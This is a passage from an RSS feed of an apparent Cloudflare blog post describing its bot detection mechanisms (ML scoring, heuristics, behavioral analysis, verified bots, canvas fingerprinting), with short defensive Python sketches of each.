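    return eval_tree(left if features[feature] < threshold else right, features)

def bot_score(trees, features):
    """Sum the margins of all trees, squash with a sigmoid, and scale to a 1-99 human-likelihood score."""
    margin = sum(eval_tree(t, features) for t in trees)
    p_human = 1.0 / (1.0 + math.exp(-margin))
    return round(1 + 98 * p_human)

# Two hand-made "trees" over hypothetical features.
trees = [
    ("requests_per_minute", 100, 0.8, -2.0),  # very fast clients look automated
    ("has_cookies", 1, -1.5, 1.2),            # cookie-less clients look automated
]
human = {"requests_per_minute": 3, "has_cookies": 1}   # scores high
bot = {"requests_per_minute": 500, "has_cookies": 0}   # scores low
```

A real model applies hundreds of such trees, but each tree is only a handful of comparisons, which is why inference stays in the microsecond range.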
    <div>
      <h3>Heuristics engine</h3>
      <a href="#heuristics-engine">
        
      </a>
    </div>
    <p>Not all problems in the world are best solved with machine learning. We can tweak the ML models in various ways, but in certain cases they will likely underperform basic heuristics. Often the problems machine learning is trying to solve are not entirely new. When building the Bot Management solution it became apparent that sometimes a single attribute of the request could give a bot away. This means that we can create a set of simple rules capturing bots in a straightforward way, while also ensuring the lowest false positive rate.</p><p>The heuristics engine was the second detection mechanism integrated into the Cloudflare Bot Management platform in 2019, and it’s also applied on every request. We have multiple heuristic types and hundreds of specific rules based on certain attributes of the request, some of which are very hard to spoof. When a request matches any of the heuristics, we assign the lowest possible score of 1.</p><p>The engine has the following properties:</p><ul><li><p><b>Speed</b> - if ML model inference takes less than 50 microseconds per model, hundreds of heuristics can be applied in just under 20 microseconds!</p></li><li><p><b>Deployability</b> - the heuristics engine allows us to add a new heuristic in a matter of seconds using <a href="/introducing-quicksilver-configuration-distribution-at-internet-scale/">Quicksilver</a>, and it will be applied on every request.</p></li><li><p><b>Vast coverage</b> - a set of simple heuristics allows us to classify ~15% of global traffic and ~30% of Bot Management customers’ traffic as bots. Not too bad for a few if conditions, right?</p></li><li><p><b>Lowest false positives</b> - because we’re very conservative about the heuristics we add, this detection mechanism has the lowest FP rate among all detection mechanisms.</p></li><li><p><b>Labels for ML</b> - because of the high certainty, we use requests classified with heuristics to train our ML models, which can then generalize behavior learnt from heuristics and improve detection accuracy.</p></li></ul><p>So heuristics gave us <a href="https://developers.google.com/machine-learning/guides/rules-of-ml#rule_7_turn_heuristics_into_features_or_handle_them_externally">a lift when combined with machine learning</a>, and they captured a lot of our intuition about bots, which helped advance the Cloudflare Bot Management platform and allowed us to onboard more customers.</p>
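An engine like this can be pictured as an ordered list of cheap predicates over request attributes: if any fires, the request gets the minimum score of 1. The rules below are invented for illustration and are not Cloudflare's actual heuristics:

```python
# Each heuristic is a named predicate over request attributes (illustrative rules only).
HEURISTICS = [
    ("empty_user_agent", lambda r: not r.get("user_agent")),
    ("scripting_tool_ua", lambda r: "python-requests" in r.get("user_agent", "")),
    ("http10_no_host", lambda r: r.get("http_version") == "1.0" and not r.get("host")),
]

def heuristic_score(request):
    """Return (score, rule_name): score 1 if any heuristic fires, else (None, None)."""
    for name, predicate in HEURISTICS:
        if predicate(request):
            return 1, name  # certain automation: lowest possible score
    return None, None       # fall through to the other detection mechanisms
```

Because each rule is a few comparisons, hundreds of them still fit comfortably in the ~20 microsecond budget mentioned above.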
    <div>
      <h3>Behavioral analysis</h3>
      <a href="#behavioral-analysis">
        
      </a>
    </div>
    <p>Machine learning and heuristics detections provide tremendous value, but both of them require human input on the labels, essentially a teacher to distinguish between right and wrong. While our supervised ML models can generalize well enough, even to novel threats similar to those we trained them on, we decided to go further. What if there were an approach that doesn’t require a teacher, but instead learns to distinguish bad behavior from normal behavior?</p><p>Enter the behavioral analysis detection mechanism, initially developed in 2018 and integrated with the Bot Management platform in 2019. This is an unsupervised machine learning approach, which has the following properties:</p><ul><li><p><b>Fitting specific customer needs</b> - it’s automatically enabled for all Bot Management customers, calculating and analyzing normal visitor behavior over an extended period of time.</p></li><li><p><b>Detects bots never seen before</b> - as it doesn’t use known bot labels, it can detect bots and anomalies deviating from the normal behavior on a specific customer’s website.</p></li><li><p><b>Harder to evade</b> - anomalous behavior is often a direct result of the bot’s specific goal.</p></li></ul><p>Please stay tuned for a more detailed blog about the behavioral analysis models and the platform powering this incredible detection mechanism, protecting many of our customers from unseen attacks.</p>
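In the meantime, the core idea can be sketched as learning a per-site baseline of normal behavior and flagging deviations from it, with no bot labels involved. This toy version uses inter-arrival times between a visitor's requests as its single behavioral feature; both the feature choice and the z-score rule are illustrative assumptions, not Cloudflare's actual models:

```python
import statistics

def fit_baseline(inter_arrival_times):
    """Learn what 'normal' visitor timing looks like from historical traffic."""
    return statistics.mean(inter_arrival_times), statistics.stdev(inter_arrival_times)

def is_anomalous(sample, baseline, z_threshold=3.0):
    """Flag samples that deviate far from the learned baseline."""
    mean, stdev = baseline
    return abs(sample - mean) / stdev > z_threshold

# Humans on this hypothetical site pause a few seconds between page loads,
# so a client firing requests every 10 ms stands out without any bot label.
baseline = fit_baseline([2.1, 3.4, 2.8, 5.0, 3.9, 2.5, 4.2, 3.1])
```

The appeal of this family of techniques is exactly what the bullets above describe: the "teacher" is the site's own traffic, so bots never seen before can still surface as anomalies.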
    <div>
      <h3>Verified bots</h3>
      <a href="#verified-bots">
        
      </a>
    </div>
    <p>So far we’ve discussed how to detect bad bots and humans. What about good bots, some of which are extremely useful for the customer website? Is there a need for a dedicated detection mechanism, or is there something we could reuse from the previously described detection mechanisms? While the majority of good bot requests (e.g. Googlebot, Bingbot, LinkedInbot) already have a low score produced by other detection mechanisms, we also need a way to avoid accidental blocks of useful bots. That’s how the Firewall field <i>cf.bot_management.verified_bot</i> came into existence in 2019, allowing customers to decide for themselves whether they want to let all of the good bots through or restrict access to certain parts of the website.</p><p>The actual platform calculating the Verified Bot flag deserves a detailed blog of its own, but in a nutshell it has the following properties:</p><ul><li><p><b>Validator based approach</b> - we support multiple validation mechanisms, each of them allowing us to reliably confirm good bot identity by clustering a set of IPs.</p></li><li><p><b>Reverse DNS validator</b> - performs a reverse DNS check to determine whether or not a bot's IP address matches its alleged hostname.</p></li><li><p><b>ASN Block validator</b> - similar to the rDNS check, but performed on an ASN block.</p></li><li><p><b>Downloader validator</b> - collects good bot IPs from either text files or HTML pages hosted on bot owner sites.</p></li><li><p><b>Machine learning validator</b> - uses an unsupervised learning algorithm, clustering good bot IPs that cannot be validated through other means.</p></li><li><p><b>Bots Directory</b> - a database with a UI that stores and manages bots that pass through the Cloudflare network.</p></li></ul>
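As an illustration of the validator idea, a reverse DNS check boils down to forward-confirmed reverse DNS, the procedure search engines publicly document for verifying their crawlers. In this sketch the resolver functions are injected as parameters (in production they would wrap real DNS lookups), and the IP, hostname, and suffix values are examples, not Cloudflare's actual validation logic:

```python
def verify_bot_ip(ip, allowed_suffixes, reverse_lookup, forward_lookup):
    """Forward-confirmed reverse DNS: the IP's hostname must belong to the
    bot operator's domain AND resolve back to the same IP."""
    hostname = reverse_lookup(ip)
    if hostname is None or not any(hostname.endswith(s) for s in allowed_suffixes):
        return False
    # Forward confirmation defeats attackers who control their own reverse DNS.
    return ip in (forward_lookup(hostname) or [])

# Fake resolvers standing in for real DNS lookups:
rdns = {"66.249.66.1": "crawl-66-249-66-1.googlebot.com"}.get
fdns = {"crawl-66-249-66-1.googlebot.com": ["66.249.66.1"]}.get
```

The forward step is what makes the check hard to spoof: an attacker can point reverse DNS for their own IP at any hostname, but they cannot make the bot operator's domain resolve back to that IP.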
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7ENyHN774m5EVfRIQpQzXO/d5d8127a3235fc8f26eb44b2de2a3919/image2-1.png" />
            
            </figure><p>Bots directory UI sample</p><p>Using multiple validation methods listed above, the Verified Bots detection mechanism identifies hundreds of unique good bot identities, belonging to different companies and categories.</p>
    <div>
      <h3>JS fingerprinting</h3>
      <a href="#js-fingerprinting">
        
      </a>
    </div>
    <p>When it comes to Bot Management detection quality, it’s all about signal quality and quantity. All previously described detections use request attributes sent over the network and analyzed on the server side using different techniques. Are there more signals available that can be extracted from the client to improve our detections?</p><p>As a matter of fact there are plenty, as every browser has unique implementation quirks. Every web browser’s graphics output, such as canvas, depends on multiple layers, including hardware (GPU) and software (drivers, operating system rendering). This highly unique output allows precise differentiation between different browser/device types. Moreover, this is achievable without sacrificing website visitor privacy: it’s not a supercookie, and it cannot be used to track and identify individual users, but only to confirm that a request’s user agent matches other telemetry gathered through the browser canvas API.</p><p>This detection mechanism is implemented as a challenge-response system, with a challenge injected into the webpage on Cloudflare’s edge. The challenge is then rendered in the background using the provided graphic instructions, and the result is sent back to Cloudflare for validation and further action, such as producing the score. There is a lot going on behind the scenes to make sure we get reliable results without sacrificing users’ privacy, while remaining resistant to tampering and replay attacks. The system is currently in private beta, being evaluated for its effectiveness, and we already see very promising results. Stay tuned for this new detection mechanism becoming widely available, and for the blog on how we’ve built it.</p><p>This concludes an overview of the five detection mechanisms we’ve built so far. It’s time to sum it all up!</p>
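One way such a challenge-response scheme could work, drastically simplified: the edge issues a one-time nonce, the browser returns its canvas render bound to that nonce, and the server checks the result against renders known for the claimed user agent. Every name and value below is an invented assumption for illustration, not Cloudflare's implementation:

```python
import hashlib

# Hypothetical per-browser-family canvas render hashes, collected offline (invented values).
KNOWN_RENDERS = {"Chrome/120": "a1b2c3", "Firefox/121": "d4e5f6"}
ISSUED_NONCES = set()

def issue_challenge(nonce):
    """Remember a fresh nonce when injecting the challenge into the page."""
    ISSUED_NONCES.add(nonce)
    return nonce

def expected_response(render_hash, nonce):
    """Bind the render hash to the nonce so responses cannot be replayed."""
    return hashlib.sha256((render_hash + nonce).encode()).hexdigest()

def validate(claimed_ua, response, nonce):
    """Accept only a fresh nonce whose render matches the claimed browser family."""
    if nonce not in ISSUED_NONCES:
        return False                      # unknown or already-used nonce
    ISSUED_NONCES.discard(nonce)          # single use: defeats replays
    known = KNOWN_RENDERS.get(claimed_ua)
    return known is not None and response == expected_response(known, nonce)
```

The nonce binding illustrates the replay-resistance property mentioned above: capturing one valid response buys an attacker nothing, since the nonce is consumed on first use.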
    <div>
      <h3>Summary</h3>
      <a href="#summary">
        
      </a>
    </div>
    <p>Cloudflare has the unique ability to collect data from trillions of requests flowing through its network every week. With this data, Cloudflare is able to identify likely bot activity with Machine Learning, Heuristics, Behavioral Analysis, and other detection mechanisms. Cloudflare Bot Management integrates seamlessly with other Cloudflare products, such as WAF and Workers.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7thZNko18uGAk7PKwxuG8s/1baf723065de6b686c81d139fbaa0163/image1-1.png" />
            
            </figure><p>All this could not be possible without hard work across multiple teams! First of all thanks to everybody on the Bots Team for their tremendous efforts to make this platform come to life. Other Cloudflare teams, most notably: Firewall, Data, Solutions Engineering, Performance, SRE, helped us a lot to design, build and support this incredible platform.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ox1rh9KPNDIy5h37liIEO/eadc3dc802b748ccc9279bc01b89b508/image11-1.jpg" />
            
            </figure><p>Bots team during Austin team summit 2019 hunting bots with axes :)</p><p>Lastly, there are more blogs from the Bots series coming soon, diving into internals of our detection mechanisms, so stay tuned for more exciting stories about Cloudflare Bot Management!</p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Firewall]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Salt]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <guid isPermaLink="false">5yHu3o1Z2Z1reLsRB0q026</guid>
            <dc:creator>Alex Bocharov</dc:creator>
        </item>
    </channel>
</rss>